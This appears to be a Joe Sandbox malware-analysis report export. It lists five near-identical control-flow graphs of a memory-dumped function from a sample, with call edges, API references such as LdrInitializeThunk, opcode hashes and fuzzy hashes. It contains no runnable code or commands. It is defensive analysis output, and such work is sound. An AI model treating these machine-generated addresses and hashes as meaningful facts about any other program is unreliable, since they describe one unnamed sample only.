                                  control_flow_graph 15201 10d13cf-10d13e6 15203 10d13f1-10d13f6 15201->15203 15462 10d13f6 call 10cabcf 15203->15462 15463 10d13f6 call 10cab97 15203->15463 15205 10d13fc-10d140e 15206 10d1415-10d143e 15205->15206 15466 10d143e call 10cac89 15206->15466 15467 10d143e call 10cac90 15206->15467 15208 10d1444-10d1456 15209 10d145d-10d1486 15208->15209 15211 10d148c-10d149e 15209->15211 15212 10d14a5-10d14ce 15211->15212 15214 10d14d4-10d14e6 15212->15214 15215 10d14ed-10d1516 15214->15215 15475 10d1516 call 10cbdb8 15215->15475 15476 10d1516 call 10cbda7 15215->15476 15217 10d151c-10d152e 15218 10d1535-10d155e 15217->15218 15477 10d155e call 10cc2de 15218->15477 15478 10d155e call 10cc338 15218->15478 15479 10d155e call 10cc388 15218->15479 15480 10d155e call 10cc3d8 15218->15480 15481 10d155e call 10cbdb8 15218->15481 15482 10d155e call 10cc044 15218->15482 15483 10d155e call 10cbda7 15218->15483 15484 10d155e call 10cc380 15218->15484 15220 10d1564-10d1576 15221 10d157d-10d15a6 15220->15221 15223 10d15ac-10d1608 15221->15223 15229 10d1613-10d1619 15223->15229 15488 10d161f call 10cdd5d 15229->15488 15489 10d161f call 10cdc38 15229->15489 15490 10d161f call 10cdc88 15229->15490 15491 10d161f call 10cdbe0 15229->15491 15492 10d161f call 10cdbf0 15229->15492 15230 10d1625-10d163c 15233 10d1647 15230->15233 15458 10d1649 call 10cde28 15233->15458 15459 10d1649 call 10cde20 15233->15459 15234 10d164f-10d166a 15237 10d1675 15234->15237 15460 10d1677 call 10cde28 15237->15460 15461 10d1677 call 10cde20 15237->15461 15238 10d167d-10d1698 15241 10d16a3 15238->15241 15464 10d16a5 call 10cde28 15241->15464 15465 10d16a5 call 10cde20 15241->15465 15242 10d16ab-10d16c6 15245 10d16d1 15242->15245 15468 10d16d3 call 10cde28 15245->15468 15469 10d16d3 call 10cde20 15245->15469 15246 10d16d9-10d16f4 15249 10d16ff 15246->15249 15473 10d1701 call 10cde28 15249->15473 15474 10d1701 call 10cde20 15249->15474 15250 10d1707-10d1773 LdrInitializeThunk 15251 10d1a8d 15250->15251 15252 10d1779-10d179d 15250->15252 15253 10d1a93-10d1aa5 15251->15253 15257 10d18ee-10d1912 15252->15257 15258 10d17a3 15252->15258 15256 10d1aac-10d1ad5 call 10ced1f 15253->15256 15262 10d1adb-10d1aed 15256->15262 15268 10d1918-10d191a 15257->15268 15269 10d1914 15257->15269 15258->15257 15260 10d17a9-10d18e2 15258->15260 15417 10d18e9 15260->15417 15265 10d1af4-10d1b1d 15262->15265 15273 10d1b23-10d1b35 15265->15273 15272 10d1921-10d194b 15268->15272 15270 10d191c 15269->15270 15271 10d1916 15269->15271 15270->15272 15271->15268 15280 10d194d 15272->15280 15281 10d1951-10d1953 15272->15281 15276 10d1b3c-10d1ba1 KiUserExceptionDispatcher 15273->15276 15470 10d1ba1 call 10cf41f 15276->15470 15471 10d1ba1 call 10cf368 15276->15471 15472 10d1ba1 call 10cf370 15276->15472 15283 10d194f 15280->15283 15284 10d1955 15280->15284 15285 10d195a-10d1960 15281->15285 15283->15281 15284->15285 15285->15251 15288 10d1966-10d1a59 15285->15288 15414 10d1a64 15288->15414 15291 10d1ba7-10d1bf3 15298 10d1edf-10d1ef0 15291->15298 15299 10d1bf9-10d1c1c 15291->15299 15305 10d2255-10d225c 15298->15305 15306 10d1ef6-10d1efd 15298->15306 15314 10d1ec7-10d1edc 15299->15314 15315 10d1c22-10d1c94 15299->15315 15309 10d22de-10d22e8 15305->15309 15310 10d2262-10d22d3 15305->15310 15312 10d1f94-10d1f9b 15306->15312 15313 10d1f03-10d1f09 15306->15313 15316 10d232e-10d2340 15309->15316 15317 10d22ea-10d2318 15309->15317 15310->15309 15318 10d210b-10d2112 15312->15318 15319 10d1fa1-10d20e6 15312->15319 15331 10d1f11 15313->15331 15332 10d1edd 15314->15332 15358 10d1eaf-10d1ec1 15315->15358 15359 10d1c9a-10d1ca1 15315->15359 15354 10d231f-10d2327 15317->15354 15318->15305 15325 10d2118-10d2238 15318->15325 15319->15305 15325->15305 15485 10d1f17 call 10cf788 15331->15485 15486 10d1f17 call 10cf787 15331->15486 15332->15332 15340 10d1f1d-10d1f3c 15357 10d1f47-10d1f57 15340->15357 15354->15316 15368 10d1f63 15357->15368 15358->15314 15358->15315 15363 10d1ca7-10d1dad 15359->15363 15364 10d1db2-10d1ddd 15359->15364 15363->15358 15364->15358 15369 10d1de3-10d1e86 15364->15369 15368->15305 15369->15358 15414->15251 15417->15251 15458->15234 15459->15234 15460->15238 15461->15238 15462->15205 15463->15205 15464->15242 15465->15242 15466->15208 15467->15208 15468->15246 15469->15246 15470->15291 15471->15291 15472->15291 15473->15250 15474->15250 15475->15217 15476->15217 15477->15220 15478->15220 15479->15220 15480->15220 15481->15220 15482->15220 15483->15220 15484->15220 15485->15340 15486->15340 15488->15230 15489->15230 15490->15230 15491->15230 15492->15230
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 8dc94568d77f5482cc1ce0b3cd5fa738f5121c2929c5b2e9b8e052b01ba7516f
                                  • Instruction ID: c311e9bcf049530c026a90a8b0b9551f42ea044a6203430327de5158c35de8eb
                                  • Opcode Fuzzy Hash: 8dc94568d77f5482cc1ce0b3cd5fa738f5121c2929c5b2e9b8e052b01ba7516f
                                  • Instruction Fuzzy Hash: AA0216B4A042288FCB64EB74C85879DB7F6AF88305F5085E9E909A3790DF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15493 10d1417-10d142e 15495 10d1439-10d143e 15493->15495 15761 10d143e call 10cac89 15495->15761 15762 10d143e call 10cac90 15495->15762 15497 10d1444-10d1456 15498 10d145d-10d1486 15497->15498 15500 10d148c-10d149e 15498->15500 15501 10d14a5-10d14ce 15500->15501 15503 10d14d4-10d14e6 15501->15503 15504 10d14ed-10d1516 15503->15504 15770 10d1516 call 10cbdb8 15504->15770 15771 10d1516 call 10cbda7 15504->15771 15506 10d151c-10d152e 15507 10d1535-10d155e 15506->15507 15772 10d155e call 10cc2de 15507->15772 15773 10d155e call 10cc338 15507->15773 15774 10d155e call 10cc388 15507->15774 15775 10d155e call 10cc3d8 15507->15775 15776 10d155e call 10cbdb8 15507->15776 15777 10d155e call 10cc044 15507->15777 15778 10d155e call 10cbda7 15507->15778 15779 10d155e call 10cc380 15507->15779 15509 10d1564-10d1576 15510 10d157d-10d15a6 15509->15510 15512 10d15ac-10d1608 15510->15512 15518 10d1613-10d1619 15512->15518 15750 10d161f call 10cdd5d 15518->15750 15751 10d161f call 10cdc38 15518->15751 15752 10d161f call 10cdc88 15518->15752 15753 10d161f call 10cdbe0 15518->15753 15754 10d161f call 10cdbf0 15518->15754 15519 10d1625-10d163c 15522 10d1647 15519->15522 15755 10d1649 call 10cde28 15522->15755 15756 10d1649 call 10cde20 15522->15756 15523 10d164f-10d166a 15526 10d1675 15523->15526 15757 10d1677 call 10cde28 15526->15757 15758 10d1677 call 10cde20 15526->15758 15527 10d167d-10d1698 15530 10d16a3 15527->15530 15759 10d16a5 call 10cde28 15530->15759 15760 10d16a5 call 10cde20 15530->15760 15531 10d16ab-10d16c6 15534 10d16d1 15531->15534 15763 10d16d3 call 10cde28 15534->15763 15764 10d16d3 call 10cde20 15534->15764 15535 10d16d9-10d16f4 15538 10d16ff 15535->15538 15768 10d1701 call 10cde28 15538->15768 15769 10d1701 call 10cde20 15538->15769 15539 10d1707-10d1773 LdrInitializeThunk 15540 10d1a8d 15539->15540 15541 10d1779-10d179d 15539->15541 15542 10d1a93-10d1aa5 15540->15542 15546 10d18ee-10d1912 15541->15546 15547 10d17a3 15541->15547 15545 10d1aac-10d1ad5 call 10ced1f 15542->15545 15551 10d1adb-10d1aed 15545->15551 15557 10d1918-10d191a 15546->15557 15558 10d1914 15546->15558 15547->15546 15549 10d17a9-10d18e2 15547->15549 15706 10d18e9 15549->15706 15554 10d1af4-10d1b1d 15551->15554 15562 10d1b23-10d1b35 15554->15562 15561 10d1921-10d194b 15557->15561 15559 10d191c 15558->15559 15560 10d1916 15558->15560 15559->15561 15560->15557 15569 10d194d 15561->15569 15570 10d1951-10d1953 15561->15570 15565 10d1b3c-10d1ba1 KiUserExceptionDispatcher 15562->15565 15765 10d1ba1 call 10cf41f 15565->15765 15766 10d1ba1 call 10cf368 15565->15766 15767 10d1ba1 call 10cf370 15565->15767 15572 10d194f 15569->15572 15573 10d1955 15569->15573 15574 10d195a-10d1960 15570->15574 15572->15570 15573->15574 15574->15540 15577 10d1966-10d1a59 15574->15577 15703 10d1a64 15577->15703 15580 10d1ba7-10d1bf3 15587 10d1edf-10d1ef0 15580->15587 15588 10d1bf9-10d1c1c 15580->15588 15594 10d2255-10d225c 15587->15594 15595 10d1ef6-10d1efd 15587->15595 15603 10d1ec7-10d1edc 15588->15603 15604 10d1c22-10d1c94 15588->15604 15598 10d22de-10d22e8 15594->15598 15599 10d2262-10d22d3 15594->15599 15601 10d1f94-10d1f9b 15595->15601 15602 10d1f03-10d1f09 15595->15602 15605 10d232e-10d2340 15598->15605 15606 10d22ea-10d2318 15598->15606 15599->15598 15607 10d210b-10d2112 15601->15607 15608 10d1fa1-10d20e6 15601->15608 15620 10d1f11 15602->15620 15621 10d1edd 15603->15621 15647 10d1eaf-10d1ec1 15604->15647 15648 10d1c9a-10d1ca1 15604->15648 15643 10d231f-10d2327 15606->15643 15607->15594 15614 10d2118-10d2238 15607->15614 15608->15594 15614->15594 15747 10d1f17 call 10cf788 15620->15747 15748 10d1f17 call 10cf787 15620->15748 15621->15621 15629 10d1f1d-10d1f3c 15646 10d1f47-10d1f57 15629->15646 15643->15605 15657 10d1f63 15646->15657 15647->15603 15647->15604 15652 10d1ca7-10d1dad 15648->15652 15653 10d1db2-10d1ddd 15648->15653 15652->15647 15653->15647 15658 10d1de3-10d1e86 15653->15658 15657->15594 15658->15647 15703->15540 15706->15540 15747->15629 15748->15629 15750->15519 15751->15519 15752->15519 15753->15519 15754->15519 15755->15523 15756->15523 15757->15527 15758->15527 15759->15531 15760->15531 15761->15497 15762->15497 15763->15535 15764->15535 15765->15580 15766->15580 15767->15580 15768->15539 15769->15539 15770->15506 15771->15506 15772->15509 15773->15509 15774->15509 15775->15509 15776->15509 15777->15509 15778->15509 15779->15509
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: a7906c0e30046288bf578e91a18204193e31cad91f5156a0a5ee58b5a42ed88d
                                  • Instruction ID: 8656e07deb64310c28aef5e9a73a0cc279d487b54e3af30d5f0c13ec92e2bb93
                                  • Opcode Fuzzy Hash: a7906c0e30046288bf578e91a18204193e31cad91f5156a0a5ee58b5a42ed88d
                                  • Instruction Fuzzy Hash: 2BF117B4A042288FCB64EB74C85879DB7F6AF88305F5085E9E909A3790DF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 15780 10d145f-10d1476 15782 10d1481-10d1486 15780->15782 15784 10d148c-10d149e 15782->15784 15785 10d14a5-10d14ce 15784->15785 15787 10d14d4-10d14e6 15785->15787 15788 10d14ed-10d1516 15787->15788 16050 10d1516 call 10cbdb8 15788->16050 16051 10d1516 call 10cbda7 15788->16051 15790 10d151c-10d152e 15791 10d1535-10d155e 15790->15791 16052 10d155e call 10cc2de 15791->16052 16053 10d155e call 10cc338 15791->16053 16054 10d155e call 10cc388 15791->16054 16055 10d155e call 10cc3d8 15791->16055 16056 10d155e call 10cbdb8 15791->16056 16057 10d155e call 10cc044 15791->16057 16058 10d155e call 10cbda7 15791->16058 16059 10d155e call 10cc380 15791->16059 15793 10d1564-10d1576 15794 10d157d-10d15a6 15793->15794 15796 10d15ac-10d1608 15794->15796 15802 10d1613-10d1619 15796->15802 16032 10d161f call 10cdd5d 15802->16032 16033 10d161f call 10cdc38 15802->16033 16034 10d161f call 10cdc88 15802->16034 16035 10d161f call 10cdbe0 15802->16035 16036 10d161f call 10cdbf0 15802->16036 15803 10d1625-10d163c 15806 10d1647 15803->15806 16037 10d1649 call 10cde28 15806->16037 16038 10d1649 call 10cde20 15806->16038 15807 10d164f-10d166a 15810 10d1675 15807->15810 16039 10d1677 call 10cde28 15810->16039 16040 10d1677 call 10cde20 15810->16040 15811 10d167d-10d1698 15814 10d16a3 15811->15814 16041 10d16a5 call 10cde28 15814->16041 16042 10d16a5 call 10cde20 15814->16042 15815 10d16ab-10d16c6 15818 10d16d1 15815->15818 16043 10d16d3 call 10cde28 15818->16043 16044 10d16d3 call 10cde20 15818->16044 15819 10d16d9-10d16f4 15822 10d16ff 15819->15822 16048 10d1701 call 10cde28 15822->16048 16049 10d1701 call 10cde20 15822->16049 15823 10d1707-10d1773 LdrInitializeThunk 15824 10d1a8d 15823->15824 15825 10d1779-10d179d 15823->15825 15826 10d1a93-10d1aa5 15824->15826 15830 10d18ee-10d1912 15825->15830 15831 10d17a3 15825->15831 15829 10d1aac-10d1ad5 call 10ced1f 15826->15829 15835 10d1adb-10d1aed 15829->15835 15841 10d1918-10d191a 15830->15841 15842 10d1914 15830->15842 15831->15830 15833 10d17a9-10d18e2 15831->15833 15990 10d18e9 15833->15990 15838 10d1af4-10d1b1d 15835->15838 15846 10d1b23-10d1b35 15838->15846 15845 10d1921-10d194b 15841->15845 15843 10d191c 15842->15843 15844 10d1916 15842->15844 15843->15845 15844->15841 15853 10d194d 15845->15853 15854 10d1951-10d1953 15845->15854 15849 10d1b3c-10d1ba1 KiUserExceptionDispatcher 15846->15849 16045 10d1ba1 call 10cf41f 15849->16045 16046 10d1ba1 call 10cf368 15849->16046 16047 10d1ba1 call 10cf370 15849->16047 15856 10d194f 15853->15856 15857 10d1955 15853->15857 15858 10d195a-10d1960 15854->15858 15856->15854 15857->15858 15858->15824 15861 10d1966-10d1a59 15858->15861 15987 10d1a64 15861->15987 15864 10d1ba7-10d1bf3 15871 10d1edf-10d1ef0 15864->15871 15872 10d1bf9-10d1c1c 15864->15872 15878 10d2255-10d225c 15871->15878 15879 10d1ef6-10d1efd 15871->15879 15887 10d1ec7-10d1edc 15872->15887 15888 10d1c22-10d1c94 15872->15888 15882 10d22de-10d22e8 15878->15882 15883 10d2262-10d22d3 15878->15883 15885 10d1f94-10d1f9b 15879->15885 15886 10d1f03-10d1f09 15879->15886 15889 10d232e-10d2340 15882->15889 15890 10d22ea-10d2318 15882->15890 15883->15882 15891 10d210b-10d2112 15885->15891 15892 10d1fa1-10d20e6 15885->15892 15904 10d1f11 15886->15904 15905 10d1edd 15887->15905 15931 10d1eaf-10d1ec1 15888->15931 15932 10d1c9a-10d1ca1 15888->15932 15927 10d231f-10d2327 15890->15927 15891->15878 15898 10d2118-10d2238 15891->15898 15892->15878 15898->15878 16060 10d1f17 call 10cf788 15904->16060 16061 10d1f17 call 10cf787 15904->16061 15905->15905 15913 10d1f1d-10d1f3c 15930 10d1f47-10d1f57 15913->15930 15927->15889 15941 10d1f63 15930->15941 15931->15887 15931->15888 15936 10d1ca7-10d1dad 15932->15936 15937 10d1db2-10d1ddd 15932->15937 15936->15931 15937->15931 15942 10d1de3-10d1e86 15937->15942 15941->15878 15942->15931 15987->15824 15990->15824 16032->15803 16033->15803 16034->15803 16035->15803 16036->15803 16037->15807 16038->15807 16039->15811 16040->15811 16041->15815 16042->15815 16043->15819 16044->15819 16045->15864 16046->15864 16047->15864 16048->15823 16049->15823 16050->15790 16051->15790 16052->15793 16053->15793 16054->15793 16055->15793 16056->15793 16057->15793 16058->15793 16059->15793 16060->15913 16061->15913
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: f507a0cf39b86264f74df1120d1dd7471f4388eabdbf9552b5eba637869e05fa
                                  • Instruction ID: de40819ee6cbc47bd6cdbfa6e03393e62e010184342ee52a419379378b9dc280
                                  • Opcode Fuzzy Hash: f507a0cf39b86264f74df1120d1dd7471f4388eabdbf9552b5eba637869e05fa
                                  • Instruction Fuzzy Hash: ECF127B4A042288FCB64EB74C85879DB7F6AF88305F5085E9E909A3790DF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 16062 10d14a7-10d14be 16064 10d14c9-10d14ce 16062->16064 16066 10d14d4-10d14e6 16064->16066 16067 10d14ed-10d1516 16066->16067 16319 10d1516 call 10cbdb8 16067->16319 16320 10d1516 call 10cbda7 16067->16320 16069 10d151c-10d152e 16070 10d1535-10d155e 16069->16070 16321 10d155e call 10cc2de 16070->16321 16322 10d155e call 10cc338 16070->16322 16323 10d155e call 10cc388 16070->16323 16324 10d155e call 10cc3d8 16070->16324 16325 10d155e call 10cbdb8 16070->16325 16326 10d155e call 10cc044 16070->16326 16327 10d155e call 10cbda7 16070->16327 16328 10d155e call 10cc380 16070->16328 16072 10d1564-10d1576 16073 10d157d-10d15a6 16072->16073 16075 10d15ac-10d1608 16073->16075 16081 10d1613-10d1619 16075->16081 16332 10d161f call 10cdd5d 16081->16332 16333 10d161f call 10cdc38 16081->16333 16334 10d161f call 10cdc88 16081->16334 16335 10d161f call 10cdbe0 16081->16335 16336 10d161f call 10cdbf0 16081->16336 16082 10d1625-10d163c 16085 10d1647 16082->16085 16337 10d1649 call 10cde28 16085->16337 16338 10d1649 call 10cde20 16085->16338 16086 10d164f-10d166a 16089 10d1675 16086->16089 16339 10d1677 call 10cde28 16089->16339 16340 10d1677 call 10cde20 16089->16340 16090 10d167d-10d1698 16093 10d16a3 16090->16093 16310 10d16a5 call 10cde28 16093->16310 16311 10d16a5 call 10cde20 16093->16311 16094 10d16ab-10d16c6 16097 10d16d1 16094->16097 16312 10d16d3 call 10cde28 16097->16312 16313 10d16d3 call 10cde20 16097->16313 16098 10d16d9-10d16f4 16101 10d16ff 16098->16101 16317 10d1701 call 10cde28 16101->16317 16318 10d1701 call 10cde20 16101->16318 16102 10d1707-10d1773 LdrInitializeThunk 16103 10d1a8d 16102->16103 16104 10d1779-10d179d 16102->16104 16105 10d1a93-10d1aa5 16103->16105 16109 10d18ee-10d1912 16104->16109 16110 10d17a3 16104->16110 16108 10d1aac-10d1ad5 call 10ced1f 16105->16108 16114 10d1adb-10d1aed 16108->16114 16120 10d1918-10d191a 16109->16120 16121 10d1914 16109->16121 16110->16109 16112 10d17a9-10d18e2 16110->16112 16269 10d18e9 16112->16269 16117 10d1af4-10d1b1d 16114->16117 16125 10d1b23-10d1b35 16117->16125 16124 10d1921-10d194b 16120->16124 16122 10d191c 16121->16122 16123 10d1916 16121->16123 16122->16124 16123->16120 16132 10d194d 16124->16132 16133 10d1951-10d1953 16124->16133 16128 10d1b3c-10d1ba1 KiUserExceptionDispatcher 16125->16128 16314 10d1ba1 call 10cf41f 16128->16314 16315 10d1ba1 call 10cf368 16128->16315 16316 10d1ba1 call 10cf370 16128->16316 16135 10d194f 16132->16135 16136 10d1955 16132->16136 16137 10d195a-10d1960 16133->16137 16135->16133 16136->16137 16137->16103 16140 10d1966-10d1a59 16137->16140 16266 10d1a64 16140->16266 16143 10d1ba7-10d1bf3 16150 10d1edf-10d1ef0 16143->16150 16151 10d1bf9-10d1c1c 16143->16151 16157 10d2255-10d225c 16150->16157 16158 10d1ef6-10d1efd 16150->16158 16166 10d1ec7-10d1edc 16151->16166 16167 10d1c22-10d1c94 16151->16167 16161 10d22de-10d22e8 16157->16161 16162 10d2262-10d22d3 16157->16162 16164 10d1f94-10d1f9b 16158->16164 16165 10d1f03-10d1f09 16158->16165 16168 10d232e-10d2340 16161->16168 16169 10d22ea-10d2318 16161->16169 16162->16161 16170 10d210b-10d2112 16164->16170 16171 10d1fa1-10d20e6 16164->16171 16183 10d1f11 16165->16183 16184 10d1edd 16166->16184 16210 10d1eaf-10d1ec1 16167->16210 16211 10d1c9a-10d1ca1 16167->16211 16206 10d231f-10d2327 16169->16206 16170->16157 16177 10d2118-10d2238 16170->16177 16171->16157 16177->16157 16329 10d1f17 call 10cf788 16183->16329 16330 10d1f17 call 10cf787 16183->16330 16184->16184 16192 10d1f1d-10d1f3c 16209 10d1f47-10d1f57 16192->16209 16206->16168 16220 10d1f63 16209->16220 16210->16166 16210->16167 16215 10d1ca7-10d1dad 16211->16215 16216 10d1db2-10d1ddd 16211->16216 16215->16210 16216->16210 16221 10d1de3-10d1e86 16216->16221 16220->16157 16221->16210 16266->16103 16269->16103 16310->16094 16311->16094 16312->16098 16313->16098 16314->16143 16315->16143 16316->16143 16317->16102 16318->16102 16319->16069 16320->16069 16321->16072 16322->16072 16323->16072 16324->16072 16325->16072 16326->16072 16327->16072 16328->16072 16329->16192 16330->16192 16332->16082 16333->16082 16334->16082 16335->16082 16336->16082 16337->16086 16338->16086 16339->16090 16340->16090
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: cd5d345e7ebbb3f7d20aa215c9754060e922ad3c1b3395654945ba1e44429eb0
                                  • Instruction ID: 6b8d1b048032d69abce23c2b21e43134d9df40f8e2482cadbfc3808adfb3c2ad
                                  • Opcode Fuzzy Hash: cd5d345e7ebbb3f7d20aa215c9754060e922ad3c1b3395654945ba1e44429eb0
                                  • Instruction Fuzzy Hash: 9BF128B4A042288FCB64EB74C85879DB7F6AF88305F5085E9E949A3790DF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 16341 10d14ef-10d1506 16343 10d1511-10d1516 16341->16343 16605 10d1516 call 10cbdb8 16343->16605 16606 10d1516 call 10cbda7 16343->16606 16345 10d151c-10d152e 16346 10d1535-10d155e 16345->16346 16607 10d155e call 10cc2de 16346->16607 16608 10d155e call 10cc338 16346->16608 16609 10d155e call 10cc388 16346->16609 16610 10d155e call 10cc3d8 16346->16610 16611 10d155e call 10cbdb8 16346->16611 16612 10d155e call 10cc044 16346->16612 16613 10d155e call 10cbda7 16346->16613 16614 10d155e call 10cc380 16346->16614 16348 10d1564-10d1576 16349 10d157d-10d15a6 16348->16349 16351 10d15ac-10d1608 16349->16351 16357 10d1613-10d1619 16351->16357 16587 10d161f call 10cdd5d 16357->16587 16588 10d161f call 10cdc38 16357->16588 16589 10d161f call 10cdc88 16357->16589 16590 10d161f call 10cdbe0 16357->16590 16591 10d161f call 10cdbf0 16357->16591 16358 10d1625-10d163c 16361 10d1647 16358->16361 16592 10d1649 call 10cde28 16361->16592 16593 10d1649 call 10cde20 16361->16593 16362 10d164f-10d166a 16365 10d1675 16362->16365 16594 10d1677 call 10cde28 16365->16594 16595 10d1677 call 10cde20 16365->16595 16366 10d167d-10d1698 16369 10d16a3 16366->16369 16596 10d16a5 call 10cde28 16369->16596 16597 10d16a5 call 10cde20 16369->16597 16370 10d16ab-10d16c6 16373 10d16d1 16370->16373 16598 10d16d3 call 10cde28 16373->16598 16599 10d16d3 call 10cde20 16373->16599 16374 10d16d9-10d16f4 16377 10d16ff 16374->16377 16603 10d1701 call 10cde28 16377->16603 16604 10d1701 call 10cde20 16377->16604 16378 10d1707-10d1773 LdrInitializeThunk 16379 10d1a8d 16378->16379 16380 10d1779-10d179d 16378->16380 16381 10d1a93-10d1aa5 16379->16381 16385 10d18ee-10d1912 16380->16385 16386 10d17a3 16380->16386 16384 10d1aac-10d1ad5 call 10ced1f 16381->16384 16390 10d1adb-10d1aed 16384->16390 16396 10d1918-10d191a 16385->16396 16397 10d1914 16385->16397 16386->16385 16388 10d17a9-10d18e2 16386->16388 16545 10d18e9 16388->16545 16393 10d1af4-10d1b1d 16390->16393 16401 10d1b23-10d1b35 16393->16401 16400 10d1921-10d194b 16396->16400 16398 10d191c 16397->16398 16399 10d1916 16397->16399 16398->16400 16399->16396 16408 10d194d 16400->16408 16409 10d1951-10d1953 16400->16409 16404 10d1b3c-10d1ba1 KiUserExceptionDispatcher 16401->16404 16600 10d1ba1 call 10cf41f 16404->16600 16601 10d1ba1 call 10cf368 16404->16601 16602 10d1ba1 call 10cf370 16404->16602 16411 10d194f 16408->16411 16412 10d1955 16408->16412 16413 10d195a-10d1960 16409->16413 16411->16409 16412->16413 16413->16379 16416 10d1966-10d1a59 16413->16416 16542 10d1a64 16416->16542 16419 10d1ba7-10d1bf3 16426 10d1edf-10d1ef0 16419->16426 16427 10d1bf9-10d1c1c 16419->16427 16433 10d2255-10d225c 16426->16433 16434 10d1ef6-10d1efd 16426->16434 16442 10d1ec7-10d1edc 16427->16442 16443 10d1c22-10d1c94 16427->16443 16437 10d22de-10d22e8 16433->16437 16438 10d2262-10d22d3 16433->16438 16440 10d1f94-10d1f9b 16434->16440 16441 10d1f03-10d1f09 16434->16441 16444 10d232e-10d2340 16437->16444 16445 10d22ea-10d2318 16437->16445 16438->16437 16446 10d210b-10d2112 16440->16446 16447 10d1fa1-10d20e6 16440->16447 16459 10d1f11 16441->16459 16460 10d1edd 16442->16460 16486 10d1eaf-10d1ec1 16443->16486 16487 10d1c9a-10d1ca1 16443->16487 16482 10d231f-10d2327 16445->16482 16446->16433 16453 10d2118-10d2238 16446->16453 16447->16433 16453->16433 16615 10d1f17 call 10cf788 16459->16615 16616 10d1f17 call 10cf787 16459->16616 16460->16460 16468 10d1f1d-10d1f3c 16485 10d1f47-10d1f57 16468->16485 16482->16444 16496 10d1f63 16485->16496 16486->16442 16486->16443 16491 10d1ca7-10d1dad 16487->16491 16492 10d1db2-10d1ddd 16487->16492 16491->16486 16492->16486 16497 10d1de3-10d1e86 16492->16497 16496->16433 16497->16486 16542->16379 16545->16379 16587->16358 16588->16358 16589->16358 16590->16358 16591->16358 16592->16362 16593->16362 16594->16366 16595->16366 16596->16370 16597->16370 16598->16374 16599->16374 16600->16419 16601->16419 16602->16419 16603->16378 16604->16378 16605->16345 16606->16345 16607->16348 16608->16348 16609->16348 16610->16348 16611->16348 16612->16348 16613->16348 16614->16348 16615->16468 16616->16468
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 0948cd090c19c9c6147c0bd358fd64249e430b70cd7c190bceefc3594c41d6be
                                  • Instruction ID: 07904845a806fa261f810a0c53a9a9312abebca14eaba732ec362a94ec5a46fd
                                  • Opcode Fuzzy Hash: 0948cd090c19c9c6147c0bd358fd64249e430b70cd7c190bceefc3594c41d6be
                                  • Instruction Fuzzy Hash: 3CF128B4A042288FCB64EB74C85879DB7F6AF88305F5085E9E949A3790DF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
